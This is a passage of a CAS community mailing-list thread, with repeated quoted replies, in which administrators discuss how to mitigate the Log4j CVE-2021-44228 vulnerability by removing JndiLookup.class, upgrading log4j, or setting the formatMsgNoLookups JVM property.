>> https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca
>>  
>> 
>> .
>>
>>
>> -- 
>> - Website: https://apereo.github.io/cas
>> - Gitter Chatroom: https://gitter.im/apereo/cas
>> - List Guidelines: https://goo.gl/1VRrw7
>> - Contributions: https://goo.gl/mh7qDG
>> --- 
>> You received this message because you are subscribed to the Google Groups 
>> "CAS Community" group.
>> To unsubscribe from this group and stop receiving emails from it, send an 
>> email to cas-user+u...@apereo.org.
>> To view this discussion on the web visit 
>> https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu
>>  
>> 
>> .
>>
> -- 
> - Website: https://apereo.github.io/cas
> - Gitter Chatroom: https://gitter.im/apereo/cas
> - List Guidelines: https://goo.gl/1VRrw7
> - Contributions: https://goo.gl/mh7qDG
> --- 
> You received this message because you are subscribed to the Google Groups 
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an 
> email to cas-user+u...@apereo.org.
>
> To view this discussion on the web visit 
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAEdMQHUe7%2BfgzA2uQ2eWFe9O-a%3D9sOP4LBi9FviTvsEMYHtKsA%40mail.gmail.com
>  
> 
> .
>
>
>

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/37170aad-78c6-4d0d-97d3-834030f0f6bcn%40apereo.org.

Re: [cas-user] log4j vulnerability

['Richard Frovarp' via CAS Community]

Maybe? The one that I've seen
https://logging.apache.org/log4j/2.x/security.html

says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to 
your JVM and not in the config file.


On 12/10/21 12:55 PM, Mike Osterman wrote:
Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in 
the log4j2.xml config file might do to trick.


I'm guessing we'd do that somewhere here at the top?




    
        /etc/cas/logs
    
    

On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community 
mailto:cas-user@apereo.org>> wrote:


Using a new enough version of the JDK might also alleviate it? The
other option is to throw the config option at the JDK to stop it
from happening. That would seem to be easiest.

On 12/10/21 12:36 PM, King, Robert wrote:


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228


Has anyone attempted to mitigate this CVE yet?

There seems to be two possible approaches to mitigation:

1 The sledgehammer approach of removing the JndiLookup.class from
the jar files:

zip –q –d log4j-core-*.jar
org/apache/logging/log4j/core/lookup/JndiLookup.class

2. Rebuild CAS and set “log4jVersion=2.15.0”

-- 
- Website: https://apereo.github.io/cas


- Gitter Chatroom: https://gitter.im/apereo/cas

- List Guidelines: https://goo.gl/1VRrw7 
- Contributions: https://goo.gl/mh7qDG 
---
You received this message because you are subscribed to the
Google Groups "CAS Community" group.
To unsubscribe from this group and stop receiving emails from it,
send an email to cas-user+unsubscr...@apereo.org
.
To view this discussion on the web visit

https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca

.



-- 
- Website: https://apereo.github.io/cas 

- Gitter Chatroom: https://gitter.im/apereo/cas

- List Guidelines: https://goo.gl/1VRrw7 
- Contributions: https://goo.gl/mh7qDG 
---
You received this message because you are subscribed to the Google
Groups "CAS Community" group.
To unsubscribe from this group and stop receiving emails from it,
send an email to cas-user+unsubscr...@apereo.org
.
To view this discussion on the web visit

https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu

.

--
- Website: https://apereo.github.io/cas 
- Gitter Chatroom: https://gitter.im/apereo/cas 


- List Guidelines: https://goo.gl/1VRrw7 
- Contributions: https://goo.gl/mh7qDG 
---
You received this message because you are subscribed to the Google 
Groups "CAS Community" group.
To unsubscribe from this group and stop receiving emails from it, send 
an email to cas-user+unsubscr...@apereo.org 
.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAEdMQHUe7%2BfgzA2uQ2eWFe9O-a%3D9sOP4LBi9FviTvsEMYHtKsA%40mail.gmail.com 
.



--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS Community" group.

To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/67916862-8f31-e08c-1949-86a97958ba36%40ndsu.edu.

Re: [cas-user] log4j vulnerability

[Mike Osterman]

Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in
the log4j2.xml config file might do to trick.

I'm guessing we'd do that somewhere here at the top?





/etc/cas/logs



On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community <
cas-user@apereo.org> wrote:

> Using a new enough version of the JDK might also alleviate it? The other
> option is to throw the config option at the JDK to stop it from happening.
> That would seem to be easiest.
>
> On 12/10/21 12:36 PM, King, Robert wrote:
>
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
>
>
>
> Has anyone attempted to mitigate this CVE yet?
>
>
>
> There seems to be two possible approaches to mitigation:
>
>
>
> 1 The sledgehammer approach of removing the JndiLookup.class from the jar
> files:
>
>
>
> zip –q –d log4j-core-*.jar
> org/apache/logging/log4j/core/lookup/JndiLookup.class
>
>
>
> 2. Rebuild CAS and set “log4jVersion=2.15.0”
> --
> - Website: https://apereo.github.io/cas
> - Gitter Chatroom: https://gitter.im/apereo/cas
> - List Guidelines: https://goo.gl/1VRrw7
> - Contributions: https://goo.gl/mh7qDG
> ---
> You received this message because you are subscribed to the Google Groups
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to cas-user+unsubscr...@apereo.org.
> To view this discussion on the web visit
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca
> 
> .
>
>
> --
> - Website: https://apereo.github.io/cas
> - Gitter Chatroom: https://gitter.im/apereo/cas
> - List Guidelines: https://goo.gl/1VRrw7
> - Contributions: https://goo.gl/mh7qDG
> ---
> You received this message because you are subscribed to the Google Groups
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to cas-user+unsubscr...@apereo.org.
> To view this discussion on the web visit
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu
> 
> .
>

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAEdMQHUe7%2BfgzA2uQ2eWFe9O-a%3D9sOP4LBi9FviTvsEMYHtKsA%40mail.gmail.com.

Re: [cas-user] log4j vulnerability

['Richard Frovarp' via CAS Community]

Using a new enough version of the JDK might also alleviate it? The other 
option is to throw the config option at the JDK to stop it from 
happening. That would seem to be easiest.


On 12/10/21 12:36 PM, King, Robert wrote:


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Has anyone attempted to mitigate this CVE yet?

There seems to be two possible approaches to mitigation:

1 The sledgehammer approach of removing the JndiLookup.class from the 
jar files:


zip –q –d log4j-core-*.jar 
org/apache/logging/log4j/core/lookup/JndiLookup.class


2. Rebuild CAS and set “log4jVersion=2.15.0”

--
- Website: https://apereo.github.io/cas 
- Gitter Chatroom: https://gitter.im/apereo/cas 


- List Guidelines: https://goo.gl/1VRrw7 
- Contributions: https://goo.gl/mh7qDG 
---
You received this message because you are subscribed to the Google 
Groups "CAS Community" group.
To unsubscribe from this group and stop receiving emails from it, send 
an email to cas-user+unsubscr...@apereo.org 
.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca 
.



--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS Community" group.

To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu.

[cas-user] log4j vulnerability

[King, Robert]

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Has anyone attempted to mitigate this CVE yet?

There seems to be two possible approaches to mitigation:

1 The sledgehammer approach of removing the JndiLookup.class from the jar files:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

2. Rebuild CAS and set "log4jVersion=2.15.0"

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca.